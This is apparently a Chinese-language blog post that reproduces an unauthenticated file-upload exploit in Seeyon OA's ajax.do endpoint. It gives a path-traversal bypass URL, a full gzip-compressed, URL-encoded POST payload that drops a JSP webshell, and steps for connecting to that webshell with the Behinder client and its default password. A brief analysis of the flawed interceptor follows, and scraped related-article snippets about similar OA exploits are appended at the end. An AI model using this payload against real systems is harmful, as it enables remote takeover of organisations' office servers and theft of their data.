打开网站

任何测试它有没有未授权文件上传

http://xxx/seeyon/thirdpartyController.do.css/…;/ajax.do

通过抓取数据包,可以看到如下的数据请求和返回结构:

返回状态404返回notfound

然后直接poc这个jspx的马是在网上找到

http://x.x.x.x/seeyon/autoinstall.do/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip

POST managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00uTK%C2%93%C2%A2H%10%3E%C3%AF%C3%BE%0A%C3%82%C2%8Bv%C3%B4%C2%8C%C2%8D+c%C2%BB%13%7Bh_%C2%88%28*%28%C2%AF%C2%8D%3D%40%15Ba%15%C2%B0%C3%B2%10%C3%AC%C2%98%C3%BF%C2%BE%05%C3%98%C3%93%3D%C2%B1%C2%BDu%C2%A9%C3%8C%C2%AC%C3%8C%C2%AF%C3%B2%C3%BD%C3%97k%C3%B7%14_H%C2%8E%C2%9DC%C2%95x%C3%9D%3F%C2%98%C3%81%17%C3%A6M%C2%A28%C2%A4%C2%96t3%2F%C3%8D%C2%BA%C3%AF%C3%A2y%C2%99%5C%C2%BC4EqT%3Fj%C3%99%05E%3E%C2%938Y%C3%80%C3%BC%C3%89t%C3%BA%C3%BD%C2%A7%C2%AB%C3%A7%3AI%C2%92%3E%C2%A5%C2%9EW%C3%85%C3%91S%C3%A7%C3%BB%C3%AFL%7B%7E%0B%C2%9D%C3%82%C3%A9%C2%A3%C2%B8%C2%BF%C2%A3%26%C2%99qA%C2%99wa%C2%92w%C2%9A%C2%A3%00%C2%91we%3EQ%C3%AB%C3%95%C3%B8%C2%8F%1D%C2%AD%C2%81%3C%26%C3%90%C3%89%C2%BCA%3FL%C2%93%C2%B2%C3%B3%C3%B0%13%C2%9E%C2%B9%C2%BB%C2%92%06%1E%C3%86%C2%B5%2F%3B1%C2%B9%C2%81YR%C2%B9%C3%9C%C2%98%C2%95%C2%96A%C3%A6%C2%8A%C3%82mKj%19%C2%8B%C2%9C%C2%A5%C3%8A%C2%82Y%5C%C2%AC%C2%B9%24%C2%80d%C2%9E%03%5E%C3%8F%C3%97D%29%5Cm%2C%1F%07%2F%C3%85Q%5CD%C2%B6%26%C3%B9%C2%90%C3%A8%15%C3%A0p%C3%A1%C2%86%2C%C3%9Ah%C3%83J%0A%C2%87%C3%8FN%C2%A4%5C%C2%B7DM%00%C3%91C%28b%C3%8E%C3%96%C2%84%C2%ABe%40%2C%C2%898%03%C3%A2%C2%B8%C2%825%3EYp%C2%96%26%0C%C3%A8%7B%C2%BAFq%C3%9A%C3%B0%C2%A6%C2%9F%5B%C3%BCJ%00K%C2%B5%C3%B8TFqmc%C2%93%C3%8BH*va%C3%B9%0F%C3%A0_%C2%BE%C3%99%C2%A2%1E%C2%BA%C3%A2%C2%A2%C2%B2L5q%C2%B9%C3%A1%C2%A3%24*%C2%A9e*7iq%C3%B4m3%60mC8%C2%83j2%C2%A3%3A7%C3%80%C2%96%C2%85e%C2%A8%18D%C2%99.%C3%8F%5B%C2%BD%C2%838%0E%28F%25%C2%89%C2%9B%C3%84%C3%A3%C2%95%01%C2%A0%C2%B4L%C3%A9-%3F%C2%B8Bc%C2%95%3A%C3%86%C3%86%C3%9Fse%00%C3%B8%C2%8DoW%01%C3%B2L%15K%C2%8B%0CZ%08%C2%8Fh%7C%2C4W%C2%B9%C2%B4l%C3%AD%C3%96D%C3%856%C3%81%C2%B9%7Dl%C2%B1eQJ7%C3%93%12%C2%ADI%C2%89%5D%02Ygz%1E%C2%9DL%C3%B6%C2%99%C3%A6%C2%B4%C3%8E%C3%BB%C3%996j%C2%BDU%40s%40%C3%B3w%C3%8F%5B%C2%A4%C2%84%C2%80%C3%A0%2B%14K%0Cg%C3%82%01.W%C2%89K%C2%80%C3%AF%C3%9CXd%1F%C3%B6%03%C3%BB%C2%B0%C2%A9%C2%B6%C2%86%C2%8D%C2%ADP%3Fo%0F%C3%92%C3%80B%C3%92%08p%C3%BA%C2%AD%C2%A9%01%12%C2%AE%C3%90T%0D%C3%8B%28%07%C2%B6%C3%A6%23%C2%A8I%C2%A9S%C2%9DG%7B%0E_%C2%9D6%C3%86%C3%B1%1B%C2%BD%26%10%C3%839%C2%A6uU%03%C2%97%28X%C2%9E%C2%AE%26%C2%AA%C2%BEA%C3%B2%21%0B%C3%974%06%C3%87%C3%9C%C3%87%1BT%C3%A6%C2%B6%09%C3%BC%23%C2%A7%C2%87u%C2%AC%1A%C2%A7%0BG%7E%C2%82%C2%AD%C3%8A%C2%8F%3F%C3%BC%19%C3%99%C2%BF%C3%BE%C2%99%C3%88%C2%95%C2%84d%C2%AD%C2%91O%C3%AB%7C%C2%81%C3%8AO%C3%96o%C3%B8%C3%9Ay%C3%A4%12%C2%9D%C2%A7%C3%B5%C2%89%C2%A1%18%24%C2%A0j%C3%B4%C3%9A%C3%BA%C3%94z%C2%8D_%C2%BF%C3%96F%C2%9E%C2%9E%C2%A9%1C%C3%84V%25%C2%9C%5D%C3%96%C2%A6%C3%B9X%C2%A4%C2%B2%28%60XMn%C3%90%18%C3%A6%C2%AE%C2%81o%C3%B4m%C2%BA%C3%97%C2%95%C2%85%12%C2%AAs%C2%9A%C3%97%C3%A2n%C2%977%C3%BD%C3%81%C2%A9x%1F%C3%A9%C3%84%C2%A6%C2%BD*%2FW%18%C2%98%3A%06%C3%BC%3E%C2%B79%C2%9D%3D%12%C3%BD%C3%AD%C2%8F%1C%C3%944%C2%9D%5E%C2%97%1Cc%C3%AAgBc%C2%A0%C3%B1%C3%83%C2%95%1B%29%C2%ACe%08%21%C2%8D%C2%8F%C3%BA%C2%A1%C2%97%C3%90X%C2%A4%C2%A0%0A%C2%9A%C2%9E%C3%9Es%C3%A3%1C%C2%8A%C3%BA%10%C3%92%C3%9A%C3%AE%C2%A6%C3%A3%C2%A6%27%01%C2%A7T%C2%8E9a%5DQgw%C3%A1%C2%B5h%C3%AB%C2%BA*%5C%7E%C3%BF%C3%B8%3E%C3%ADL%C2%9AG%7D%C2%82R%C3%90%C2%9F%C2%BCh%C3%B3o%C3%83%C2%99%07bH%07%1E%C3%9E%C3%AFv%C3%96%3FW%C3%AA%C3%BDw%C2%AA%5B%C2%B3%3B%C3%93%C3%9A%C2%B6L%C3%AF%0E%C3%98o%C3%AFI%7E%3AQ%C2%80f%09%3C%7C%C3%A9%1C%0F%C2%8B%C2%AF%C3%8F%1F%C2%97%C3%84%C3%87%7D%C3%93o%18%1C%C3%B5%3E%C2%82%C3%BF%C2%9F.%C3%80q%C3%AAQ%C3%87%7E%7C%C2%AF%C3%B7%21%25%C2%A0wb%C3%92%C3%8C%C3%89%10%60%C3%8A%C2%B2%C3%AC%3D%C2%BCv%7F%C3%90%25I%17%C3%A5k%7Dg%C2%97%C3%9C%C3%AB%C3%BE%C3%BD%2FheA%C3%A4_%05%00%00

然后抓包

然后查看自己的马上传成功没

http://x.x.x.x/seeyon/SeeyonUpdate1.jspx

然后用冰蝎连

jsp的马默认密码是rebeyond

漏洞的出现的原因

补丁里

com.seeyon.ctp.common.spring.CTPHandlerInterceptor
漏洞代码

CTPHandlerInterceptor这个东西,我们可以类比为spring版的filter,针对某些请求做过滤。我们可以看到,如果url出现"./", ";", ".#",则直接拦截请求。那么我们分析一下请求流程
CTPHandlerInterceptor首先判断是否为ajax请求,也就是url是否包含ajax.do。

if (!needlessUrl && !User.isIgnoreUrl(ignoreUrl, request, response)) {

boolean state = this.checkSessionPre(request, response, handler.getClass().getCanonicalName(), isAjax);

if (!state) { return state;

}

User.validateResource(url, true);

User.isIgnoreUrl方法的作用主要是根据ignoreUrl是否需要重定向用户至登录页面。当然,部分ajax请求是不需要登录的,这也就给我们造成可乘之机。

payload构造。要先gzip压缩然后。url编码。漏洞原理利用未授权AjaxController。利用类名方法名可控。可控formulaManager然后利用反射invokeService给service:formulaManager类名属性赋值。然后利用致远自己的类动态编译的手法编译。触发漏洞。

poc

/seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip

然后post

从致远OA-ajax.do未授权文件上传漏洞复现相关推荐

  1. ajax的auto是true,致远OA ajax.do未授权上传/seeyon/autoinstall.do.css(莫名其妙的坑记录一下) CNVD-2021-01627...

    0x01 打seeyon的站用ajax.do未授权上传的时候遇见了神奇的事情,先上payload吧,下面shell的路径为/seeyon/bak0.jspx,哥斯拉默认密码和密钥. POST /see ...

  2. 致远OA文件上传漏洞(含批量检测POC)

    文章目录 文件上传 wpsAssistServlet 任意文件上传 漏洞描述 漏洞影响 网络测绘 批量检测POC ajax.do 任意文件上传 CNVD-2021-01627漏洞 漏洞描述 漏洞影响 ...

  3. 致远OA wpsAssistServlet 任意文件上传漏洞 漏洞复现

    为方便您的阅读,可点击下方蓝色字体,进行跳转↓↓↓ 01 漏洞描述 02 影响范围 03 利用方式 04 修复方案 01 漏洞描述 致远OA是一套办公协同管理软件.致远OA wpsAssistServ ...

  4. Goby 漏洞更新 | 万户 OA OfficeServer.jsp 任意文件上传漏洞

    漏洞名称:万户 OA OfficeServer.jsp 任意文件上传漏洞 English Name:ezOFFICE OA OfficeServer.jsp Arbitrarily File Uplo ...

  5. 某OA ajax.do 未授权漏洞任意文件上传getshell复现

    某OA ajax.do 未授权漏洞任意文件上传getshell复现 0x00 简介 某OA A8 是一款流行的协同管理软件,在各中.大型企业机构中广泛使用. 由于某旧版本某些接口能被未授权访问,并且部 ...

  6. 致远OA 文件上传漏洞

    报告编号:B6-2021-010801 报告来源:360CERT 报告作者:360CERT 更新日期:2021-01-08 0x01漏洞简述 2021年01月08日,360CERT监测发现致远OA发布 ...

  7. 通达OA V11.3 代码审计 (文件上传、文件包含、任意用户登录漏洞)

    因为这段时间比较忙,抽出时间写博客很不容易,所以就简单的吧印象笔记里面的内容站上俩,没有写太多具体的分析过程,尽量都在截图中说明了 附件 通达OA11.3源码(未解码,可以自己去下SeayDzend解 ...

  8. 泛微OA V8 SQL注入漏洞和文件上传漏洞

    fofa语句 app="泛微-协同办公OA" SQL注入 在泛微OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中 ...

  9. 文件上传漏洞_通达OA前台任意文件上传漏洞+文件包含漏洞导致getshell

    点击蓝字|关注我们 通达OA前台任意文件上传漏洞 +文件包含漏洞导致getshell 一.漏洞介绍/Profile/ 通达OA介绍: 通达OA(Office Anywhere网络智能办公系统)是由北京 ...

  10. 致远OA ajax.do 任意文件上传 (CNVD-2021-01627) 漏洞复现

    为方便您的阅读,可点击下方蓝色字体,进行跳转↓↓↓ 01 漏洞描述 02 影响范围 03 验证方式 04 利用方式 05 修复方案 01 漏洞描述 致远OA是一套办公协同管理软件.由于致远OA旧版本某 ...

最新文章

  1. IDEA 中的神奇插件:防沉迷、防猝死...
  2. als算法参数_Spark2.0协同过滤与ALS算法介绍
  3. nodejs+express4.0+mongodb安装方法 for Linux, Mac
  4. 近5年133个Java面试题 你会几个?
  5. 少儿编程100讲轻松学python(三)-python如何重命名文件
  6. 半圆阴影_六年级数学:怎么求阴影部分面积?正方形与半圆,割补法常考题
  7. 同时安装sql server和oracle导致系统启动变慢的解决方案
  8. 爬取上千个年度基金后,才知道这有多坑,千万别被人当韭菜给割了
  9. AMQ学习笔记 - 16. 确认机制的测试
  10. Python调用搜狗语音API实现文字转音频
  11. 高通MSM8937芯片参考资料免费下载
  12. python计算矩阵的散度_Python Sympy计算梯度、散度和旋度的实例
  13. Jmeter Ant Jenkins报告优化——jmeter.results.shanhe.me模板的response和request值为空的解决方案
  14. Chrome浏览器另存为时浏览器假死问题
  15. Unirech腾讯云代充-通过VNC 登录腾讯云国际版Windows云服务器实例教程
  16. STM32与Flash AT45DB321D之间读写数据
  17. C++ 读取 HDF5
  18. 广工计算机组成原理考试,广工计算机组成原理期末考试B卷(杨卫平)
  19. 计算机组成原理知识架构
  20. 【深度学习】非常详细 | 用 Pytorch 理解卷积网络

热门文章

  1. 人工智能产品经理及十种AI常用算法
  2. 今晚直播 | 手把手带你用 Three.js 实现粒子特效,走入 3D 世界!
  3. Hspice中的测量语句(II)
  4. 自媒体学习教程 新手怎么开始学习自媒体
  5. 线性链表--插入、删除、显示、销毁
  6. 建筑工程师的转行学计算机科学与技术的抉择
  7. 工作中使用到的单词(软件开发)_2022_0815备份
  8. 鸟哥的linux私房菜-服务器架设篇 读书笔记
  9. 第一象限直线插补程序 c语言,直线插补算法流程(求助四个象限的直线插补程序)...
  10. Ruff自主研发的NB-IoT智能网关获得联通实验室测试通过